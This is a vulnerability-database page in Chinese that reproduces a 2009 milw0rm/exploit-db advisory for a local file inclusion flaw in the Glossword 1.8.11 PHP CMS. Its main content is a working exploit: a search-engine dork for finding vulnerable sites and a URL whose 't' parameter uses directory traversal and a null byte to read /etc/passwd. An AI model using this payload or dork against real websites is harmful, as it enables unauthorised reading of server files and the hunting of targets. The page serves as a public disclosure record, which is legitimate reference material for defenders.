Glossword 1.8.11 - 'index.php?x' Local File Inclusion

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057938 漏洞类型
发布时间 2009-06-24 更新时间 2009-06-24
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/9010
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
|-->Glossword 1.8.11 LFI
|-->CMS INFORMATION:
|                                                   
|-->WEB: http://code.google.com/p/glossword/                              
|-->DOWNLOAD: http://code.google.com/p/glossword/downloads/list                                  
|-->DESCRIPTION: Glossword is a system written in PHP to create and publish online multilingual dictionary, glossary, or encyclopedia.            
|                                               
|  CMS VULNERABILITY:                                       
|                                               
|-->TESTED ON: firefox 3                                           
|-->DORK: "Powered by Glossword 1.8.11" , "Powered by Glossword 1.8.6" ...                                           
|-->CATEGORY: LOCAL FILE INCLUSION (LFI)               
|-->AFFECT VERSION: all > 1.8.11                           
|-->Author: t0fx                                                                    
|-->GREETZ: europasecurity.org // security-shell.ws // str0ke // elitexbytes // Pig le marabou belge // p3lo // Sh0ck le congolais

|-->Exploit :
| http://www.website.fr/glossword_path/index.php?t=../../../../../../../../../../../../../etc/passwd%00

# milw0rm.com [2009-06-24]